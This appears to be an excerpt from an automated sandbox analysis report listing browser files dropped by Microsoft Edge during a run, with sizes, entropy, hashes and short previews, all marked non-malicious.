                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:data
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):280
                                                                                                                                                              Entropy (8bit):1.7743147021878358
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:FiWWltlxVLVH+aQ/XlQTMUaitIdmW89G/:o1jLVH+BXWofuIIW89
                                                                                                                                                              MD5:3EA201AEF287EBF973E1A12BFE5F5C51
                                                                                                                                                              SHA1:EAFB1D1BE3560ABF539E145CF6DF2C399964D605
                                                                                                                                                              SHA-256:C075F48214230427DBA7B750D520BED4C1AF506FA5E6F1A90D741F3F9FFCFCB3
                                                                                                                                                              SHA-512:8351348611B1148B3C7FD742FD6C706BDCA10C1E7F0D35DD03D48DAA883E82682B48D56E23B09DDACAC27A8BEDC90E0679183E0106C90B3064D967952BCA6561
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:sdPC.....................!....B...)....................................................................................................................................................................................................1d6028a1-60eb-480a-a77a-a923f6a0f623............
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:ASCII text
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):20
                                                                                                                                                              Entropy (8bit):3.6219280948873624
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:8g6Vvn:8g6Vv
                                                                                                                                                              MD5:9E4E94633B73F4A7680240A0FFD6CD2C
                                                                                                                                                              SHA1:E68E02453CE22736169A56FDB59043D33668368F
                                                                                                                                                              SHA-256:41C91A9C93D76295746A149DCE7EBB3B9EE2CB551D84365FFF108E59A61CC304
                                                                                                                                                              SHA-512:193011A756B2368956C71A9A3AE8BC9537D99F52218F124B2E64545EEB5227861D372639052B74D0DD956CB33CA72A9107E069F1EF332B9645044849D14AF337
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:level=none expiry=0.
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:very short file (no magic)
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):1
                                                                                                                                                              Entropy (8bit):0.0
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:L:L
                                                                                                                                                              MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                              SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                              SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                              SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:.
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:data
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):45056
                                                                                                                                                              Entropy (8bit):0.012699554836657426
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:MsFlYhEtlGJllXEagKlErKlnl//1g6q/l:/FiEXGll5ln/O
                                                                                                                                                              MD5:AB91D3B7BD95B6696992F6EAEB807D47
                                                                                                                                                              SHA1:B2043CEFBEF3539C2FA046BFF4EA36A9D6A56AAA
                                                                                                                                                              SHA-256:496235D6701BD37CD70AC93BD5C9292C4C2060F722C65502FB9FB687BED47ECF
                                                                                                                                                              SHA-512:B9443D2B5153A491D873A18586AA1E78EFCCAC9BE0F019160D4A3C01282201529F9CD4EEA0463D2956493620DB1AF8C5D5927BA954F4259785E6FC9FE51AAA2D
                                                                                                                                                              Malicious:false
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:data
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):270336
                                                                                                                                                              Entropy (8bit):0.028947412170811843
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:12:U/BEbtMFwGzwcdCIRrYfhbtZPC93OHjsqJm09MWPG:qUtMFwGzTd/Rc1PCQHjTpM
                                                                                                                                                              MD5:1266DCB65D6BDA2AAD513390AA95CA09
                                                                                                                                                              SHA1:F5884EFA6A3527D1513F3C6BEBB1758EC9F72C80
                                                                                                                                                              SHA-256:AA320E1E76EF58E00943718AB13471F387D24AC1A48673F0FE976407455EE96A
                                                                                                                                                              SHA-512:72F189FD6A6E2F414B5A041E1E9F9684BAFC8476B0EC373EA4EC5E5C89A12DA26937FA5945E835793CB9F732B0EE50E9E5D0D9460E846D7C3E13F3BD1FEE7D48
                                                                                                                                                              Malicious:false
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:data
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):8192
                                                                                                                                                              Entropy (8bit):0.011852361981932763
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:MsHlDll:/H
                                                                                                                                                              MD5:0962291D6D367570BEE5454721C17E11
                                                                                                                                                              SHA1:59D10A893EF321A706A9255176761366115BEDCB
                                                                                                                                                              SHA-256:EC1702806F4CC7C42A82FC2B38E89835FDE7C64BB32060E0823C9077CA92EFB7
                                                                                                                                                              SHA-512:F555E961B69E09628EAF9C61F465871E6984CD4D31014F954BB747351DAD9CEA6D17C1DB4BCA2C1EB7F187CB5F3C0518748C339C8B43BBD1DBD94AEAA16F58ED
                                                                                                                                                              Malicious:false
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:data
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):8192
                                                                                                                                                              Entropy (8bit):0.012340643231932763
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:MsGl3ll:/y
                                                                                                                                                              MD5:41876349CB12D6DB992F1309F22DF3F0
                                                                                                                                                              SHA1:5CF26B3420FC0302CD0A71E8D029739B8765BE27
                                                                                                                                                              SHA-256:E09F42C398D688DCE168570291F1F92D079987DEDA3099A34ADB9E8C0522B30C
                                                                                                                                                              SHA-512:E9A4FC1F7CB6AE2901F8E02354A92C4AAA7A53C640DCF692DB42A27A5ACC2A3BFB25A0DE0EB08AB53983132016E7D43132EA4292E439BB636AAFD53FB6EF907E
                                                                                                                                                              Malicious:false
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:FoxPro FPT, blocks size 768, next free block index 3284796353, field type 0
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):524656
                                                                                                                                                              Entropy (8bit):5.027445846313988E-4
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:Lsuldj//:LswX
                                                                                                                                                              MD5:E26E6BE7D8C8B23CE4203F25D79433A8
                                                                                                                                                              SHA1:9DC2B2751CD7A5D8F8C633A1AB2216852925E707
                                                                                                                                                              SHA-256:06DB5E5A496EB20ADFC147042A98134E56DB48C0B80929E4C9A749C35169CAB8
                                                                                                                                                              SHA-512:BF841F7E89561C94A1428E210C3524D70D746865FBF49096E04553990A4613260928CBE1D30F6D2D3BB290A3AFEFDE7F96A3AFE25EE175865DBC65BCBFBFC9FB
                                                                                                                                                              Malicious:false
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:data
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):24
                                                                                                                                                              Entropy (8bit):2.1431558784658327
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:m+l:m
                                                                                                                                                              MD5:54CB446F628B2EA4A5BCE5769910512E
                                                                                                                                                              SHA1:C27CA848427FE87F5CF4D0E0E3CD57151B0D820D
                                                                                                                                                              SHA-256:FBCFE23A2ECB82B7100C50811691DDE0A33AA3DA8D176BE9882A9DB485DC0F2D
                                                                                                                                                              SHA-512:8F6ED2E91AED9BD415789B1DBE591E7EAB29F3F1B48FDFA5E864D7BF4AE554ACC5D82B4097A770DABC228523253623E4296C5023CF48252E1B94382C43123CB0
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:0\r..m..................
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:data
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):48
                                                                                                                                                              Entropy (8bit):2.9972243200613975
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:pfdSyEfKj6n:2fKj6
                                                                                                                                                              MD5:F7F504BC76D7F404570E8E7EF1D7CF51
                                                                                                                                                              SHA1:22E9973F3F4012E084D6A0985A518A6DF8E88650
                                                                                                                                                              SHA-256:DC14EC6513A853EEA891CCDDE2EEB1FDB0B578DB281383B6CD25CFD1E2505872
                                                                                                                                                              SHA-512:5876BF590AB57A7D7227E70C6ACAF91DEB4C0B4A11DD04F91AFAE86BD378F33AED9514A02128F6E34FF3C683A05322AD986302167FF76D0B22AB2B246A3AF7A0
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:(...4zL.oy retne............................./.
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:data
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):24
                                                                                                                                                              Entropy (8bit):2.1431558784658327
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:m+l:m
                                                                                                                                                              MD5:54CB446F628B2EA4A5BCE5769910512E
                                                                                                                                                              SHA1:C27CA848427FE87F5CF4D0E0E3CD57151B0D820D
                                                                                                                                                              SHA-256:FBCFE23A2ECB82B7100C50811691DDE0A33AA3DA8D176BE9882A9DB485DC0F2D
                                                                                                                                                              SHA-512:8F6ED2E91AED9BD415789B1DBE591E7EAB29F3F1B48FDFA5E864D7BF4AE554ACC5D82B4097A770DABC228523253623E4296C5023CF48252E1B94382C43123CB0
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:0\r..m..................
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:data
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):48
                                                                                                                                                              Entropy (8bit):2.9972243200613975
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:Y+lXAyEO8G:YOQ9tG
                                                                                                                                                              MD5:11AA5D04A8BF797CF732B80DD888D137
                                                                                                                                                              SHA1:D452A548D92DAEA8E15133D33AAE4D10D39EAEA0
                                                                                                                                                              SHA-256:88ED9F254AD70B720116BEE6C28883BA6C04B42AB078F45C371D9393A068260F
                                                                                                                                                              SHA-512:5B3CA85B36E40E2750D0A6401DF58A70A1A8BA5CE076144F58FCA5EB68C9C6D875E3CDBE1C27C0AA7B855887753A0CEB1C1387DD95EDDC3DB2AA5DD430C627E1
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:(....[..oy retne............................../.
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:FoxPro FPT, blocks size 512, next free block index 3284796609, field type 0
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):8192
                                                                                                                                                              Entropy (8bit):0.01057775872642915
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:MsFl:/F
                                                                                                                                                              MD5:CF89D16BB9107C631DAABF0C0EE58EFB
                                                                                                                                                              SHA1:3AE5D3A7CF1F94A56E42F9A58D90A0B9616AE74B
                                                                                                                                                              SHA-256:D6A5FE39CD672781B256E0E3102F7022635F1D4BB7CFCC90A80FFFE4D0F3877E
                                                                                                                                                              SHA-512:8CB5B059C8105EB91E74A7D5952437AAA1ADA89763C5843E7B0F1B93D9EBE15ED40F287C652229291FAC02D712CF7FF5ECECEF276BA0D7DDC35558A3EC3F77B0
                                                                                                                                                              Malicious:false
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:data
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):270336
                                                                                                                                                              Entropy (8bit):8.280239615765425E-4
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:MsEllllkEthXllkl2:/M/xT02
                                                                                                                                                              MD5:D0D388F3865D0523E451D6BA0BE34CC4
                                                                                                                                                              SHA1:8571C6A52AACC2747C048E3419E5657B74612995
                                                                                                                                                              SHA-256:902F30C1FB0597D0734BC34B979EC5D131F8F39A4B71B338083821216EC8D61B
                                                                                                                                                              SHA-512:376011D00DE659EB6082A74E862CFAC97A9BB508E0B740761505142E2D24EC1C30AA61EFBC1C0DD08FF0F34734444DE7F77DD90A6CA42B48A4C7FAD5F0BDDD17
                                                                                                                                                              Malicious:false
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:data
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):8192
                                                                                                                                                              Entropy (8bit):0.011852361981932763
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:MsHlDll:/H
                                                                                                                                                              MD5:0962291D6D367570BEE5454721C17E11
                                                                                                                                                              SHA1:59D10A893EF321A706A9255176761366115BEDCB
                                                                                                                                                              SHA-256:EC1702806F4CC7C42A82FC2B38E89835FDE7C64BB32060E0823C9077CA92EFB7
                                                                                                                                                              SHA-512:F555E961B69E09628EAF9C61F465871E6984CD4D31014F954BB747351DAD9CEA6D17C1DB4BCA2C1EB7F187CB5F3C0518748C339C8B43BBD1DBD94AEAA16F58ED
                                                                                                                                                              Malicious:false
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:data
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):8192
                                                                                                                                                              Entropy (8bit):0.012340643231932763
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:MsGl3ll:/y
                                                                                                                                                              MD5:41876349CB12D6DB992F1309F22DF3F0
                                                                                                                                                              SHA1:5CF26B3420FC0302CD0A71E8D029739B8765BE27
                                                                                                                                                              SHA-256:E09F42C398D688DCE168570291F1F92D079987DEDA3099A34ADB9E8C0522B30C
                                                                                                                                                              SHA-512:E9A4FC1F7CB6AE2901F8E02354A92C4AAA7A53C640DCF692DB42A27A5ACC2A3BFB25A0DE0EB08AB53983132016E7D43132EA4292E439BB636AAFD53FB6EF907E
                                                                                                                                                              Malicious:false
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:FoxPro FPT, blocks size 768, next free block index 3284796353, field type 0
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):262512
                                                                                                                                                              Entropy (8bit):9.553120663130604E-4
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:LsNlDRG//:Ls3Nm
                                                                                                                                                              MD5:B948FAA26724507AB3B80B88081C082A
                                                                                                                                                              SHA1:CD258E7331F32E5AA7C46214F261DDCEF4444380
                                                                                                                                                              SHA-256:2804935E771F9A47DDDCD0C6A7735BC933639C5D42273DA6BD88CB74C8413A1C
                                                                                                                                                              SHA-512:C7B73FC4DA10595F47AEE39221B1660CE897F5E9829204AA7FC488F73A727956CDAA2BAEAD641C9705B49AA54F9ED3CB6CFBF192B6C307A192E19BF5075369C5
                                                                                                                                                              Malicious:false
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:ASCII text
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):16
                                                                                                                                                              Entropy (8bit):3.2743974703476995
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                              MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                              SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                              SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                              SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:MANIFEST-000001.
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:data
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):33
                                                                                                                                                              Entropy (8bit):3.5394429593752084
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:iWstvhYNrkUn:iptAd
                                                                                                                                                              MD5:F27314DD366903BBC6141EAE524B0FDE
                                                                                                                                                              SHA1:4714D4A11C53CF4258C3A0246B98E5F5A01FBC12
                                                                                                                                                              SHA-256:68C7AD234755B9EDB06832A084D092660970C89A7305E0C47D327B6AC50DD898
                                                                                                                                                              SHA-512:07A0D529D9458DE5E46385F2A9D77E0987567BA908B53DDB1F83D40D99A72E6B2E3586B9F79C2264A83422C4E7FC6559CAC029A6F969F793F7407212BB3ECD51
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:...m.................DB_VERSION.1
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:ASCII text
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):16
                                                                                                                                                              Entropy (8bit):3.2743974703476995
                                                                                                                                                              Encrypted:false
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:MANIFEST-000001.
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:ASCII text
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):285
                                                                                                                                                              Entropy (8bit):5.272113637469218
                                                                                                                                                              Encrypted:false
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:2024/11/21-05:27:21.041 1928 Creating DB C:\Users\user\AppData\Local\Temp\chr6BC.tmp\Default\EdgeCoupons/coupons_data.db since it was missing..2024/11/21-05:27:21.150 1928 Reusing MANIFEST C:\Users\user\AppData\Local\Temp\chr6BC.tmp\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:OpenPGP Secret Key
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):41
                                                                                                                                                              Entropy (8bit):4.704993772857998
                                                                                                                                                              Encrypted:false
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:.|.."....leveldb.BytewiseComparator......
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:ASCII text
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):16
                                                                                                                                                              Entropy (8bit):3.2743974703476995
                                                                                                                                                              Encrypted:false
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:MANIFEST-000001.
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:data
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):171
                                                                                                                                                              Entropy (8bit):1.8784775129881184
                                                                                                                                                              Encrypted:false
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:ASCII text
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):16
                                                                                                                                                              Entropy (8bit):3.2743974703476995
                                                                                                                                                              Encrypted:false
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:MANIFEST-000001.
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:ASCII text
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):259
                                                                                                                                                              Entropy (8bit):5.241327403303907
                                                                                                                                                              Encrypted:false
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:2024/11/21-05:27:21.039 a88 Creating DB C:\Users\user\AppData\Local\Temp\chr6BC.tmp\Default\Extension Rules since it was missing..2024/11/21-05:27:21.166 a88 Reusing MANIFEST C:\Users\user\AppData\Local\Temp\chr6BC.tmp\Default\Extension Rules/MANIFEST-000001.
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:OpenPGP Secret Key
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):41
                                                                                                                                                              Entropy (8bit):4.704993772857998
                                                                                                                                                              Encrypted:false
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:.|.."....leveldb.BytewiseComparator......
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:ASCII text
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):16
                                                                                                                                                              Entropy (8bit):3.2743974703476995
                                                                                                                                                              Encrypted:false
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:MANIFEST-000001.
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:data
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):171
                                                                                                                                                              Entropy (8bit):1.8784775129881184
                                                                                                                                                              Encrypted:false
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:ASCII text
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):16
                                                                                                                                                              Entropy (8bit):3.2743974703476995
                                                                                                                                                              Encrypted:false
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:MANIFEST-000001.
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:ASCII text
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):263
                                                                                                                                                              Entropy (8bit):5.214891963289152
                                                                                                                                                              Encrypted:false
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:2024/11/21-05:27:21.254 a88 Creating DB C:\Users\user\AppData\Local\Temp\chr6BC.tmp\Default\Extension Scripts since it was missing..2024/11/21-05:27:21.313 a88 Reusing MANIFEST C:\Users\user\AppData\Local\Temp\chr6BC.tmp\Default\Extension Scripts/MANIFEST-000001.
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:OpenPGP Secret Key
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):41
                                                                                                                                                              Entropy (8bit):4.704993772857998
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                              MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                              SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                              SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                              SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:.|.."....leveldb.BytewiseComparator......
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 10, cookie 0x8, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):20480
                                                                                                                                                              Entropy (8bit):0.6975083372685086
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:24:LLiZxh0GY/l1rWR1PmCx9fZjsBX+T6UwcE85fBmI:EBmw6fU1zBmI
                                                                                                                                                              MD5:F5BBD8449A9C3AB28AC2DE45E9059B01
                                                                                                                                                              SHA1:C569D730853C33234AF2402E69C19E0C057EC165
                                                                                                                                                              SHA-256:825FF36C4431084C76F3D22CE0C75FA321EA680D1F8548706B43E60FCF5B566E
                                                                                                                                                              SHA-512:96ACDED5A51236630A64FAE91B8FA9FAB43E22E0C1BCB80C2DD8D4829E03FBFA75AA6438053599A42EC4BBCF805BF0B1E6DFF9069B2BA182AD0BB30F2542FD3F
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................j..........g....._.c...~.2.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................s...;+...indexfavicon_bitmaps_icon_idfavico
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:FoxPro FPT, blocks size 512, next free block index 3284796609, field type 0
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):8192
                                                                                                                                                              Entropy (8bit):0.01057775872642915
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:MsFl:/F
                                                                                                                                                              MD5:CF89D16BB9107C631DAABF0C0EE58EFB
                                                                                                                                                              SHA1:3AE5D3A7CF1F94A56E42F9A58D90A0B9616AE74B
                                                                                                                                                              SHA-256:D6A5FE39CD672781B256E0E3102F7022635F1D4BB7CFCC90A80FFFE4D0F3877E
                                                                                                                                                              SHA-512:8CB5B059C8105EB91E74A7D5952437AAA1ADA89763C5843E7B0F1B93D9EBE15ED40F287C652229291FAC02D712CF7FF5ECECEF276BA0D7DDC35558A3EC3F77B0
                                                                                                                                                              Malicious:false
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:data
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):270336
                                                                                                                                                              Entropy (8bit):8.280239615765425E-4
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:MsEllllkEthXllkl2:/M/xT02
                                                                                                                                                              MD5:D0D388F3865D0523E451D6BA0BE34CC4
                                                                                                                                                              SHA1:8571C6A52AACC2747C048E3419E5657B74612995
                                                                                                                                                              SHA-256:902F30C1FB0597D0734BC34B979EC5D131F8F39A4B71B338083821216EC8D61B
                                                                                                                                                              SHA-512:376011D00DE659EB6082A74E862CFAC97A9BB508E0B740761505142E2D24EC1C30AA61EFBC1C0DD08FF0F34734444DE7F77DD90A6CA42B48A4C7FAD5F0BDDD17
                                                                                                                                                              Malicious:false
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:data
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):8192
                                                                                                                                                              Entropy (8bit):0.011852361981932763
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:MsHlDll:/H
                                                                                                                                                              MD5:0962291D6D367570BEE5454721C17E11
                                                                                                                                                              SHA1:59D10A893EF321A706A9255176761366115BEDCB
                                                                                                                                                              SHA-256:EC1702806F4CC7C42A82FC2B38E89835FDE7C64BB32060E0823C9077CA92EFB7
                                                                                                                                                              SHA-512:F555E961B69E09628EAF9C61F465871E6984CD4D31014F954BB747351DAD9CEA6D17C1DB4BCA2C1EB7F187CB5F3C0518748C339C8B43BBD1DBD94AEAA16F58ED
                                                                                                                                                              Malicious:false
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:data
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):8192
                                                                                                                                                              Entropy (8bit):0.012340643231932763
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:MsGl3ll:/y
                                                                                                                                                              MD5:41876349CB12D6DB992F1309F22DF3F0
                                                                                                                                                              SHA1:5CF26B3420FC0302CD0A71E8D029739B8765BE27
                                                                                                                                                              SHA-256:E09F42C398D688DCE168570291F1F92D079987DEDA3099A34ADB9E8C0522B30C
                                                                                                                                                              SHA-512:E9A4FC1F7CB6AE2901F8E02354A92C4AAA7A53C640DCF692DB42A27A5ACC2A3BFB25A0DE0EB08AB53983132016E7D43132EA4292E439BB636AAFD53FB6EF907E
                                                                                                                                                              Malicious:false
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:FoxPro FPT, blocks size 768, next free block index 3284796353, field type 0
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):262512
                                                                                                                                                              Entropy (8bit):9.553120663130604E-4
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:LsNlo//:Ls3o
                                                                                                                                                              MD5:F110E320E08EB43276136574077E2420
                                                                                                                                                              SHA1:62D89145F2D8C91818CDD953CD32546BE1877179
                                                                                                                                                              SHA-256:D2582808DC6C18904FA17C12EF6AA7D7D2B0973430E5BEA20D3DD203E75BA5D7
                                                                                                                                                              SHA-512:B2D05CF7AB2183322DDCE234A752F059D64D46B92782D0C323C9B72F8688D8013592FC6E12A1D7C01640791AACF5243A68E804A6A96C9F66881DA7E1F1D2DFCD
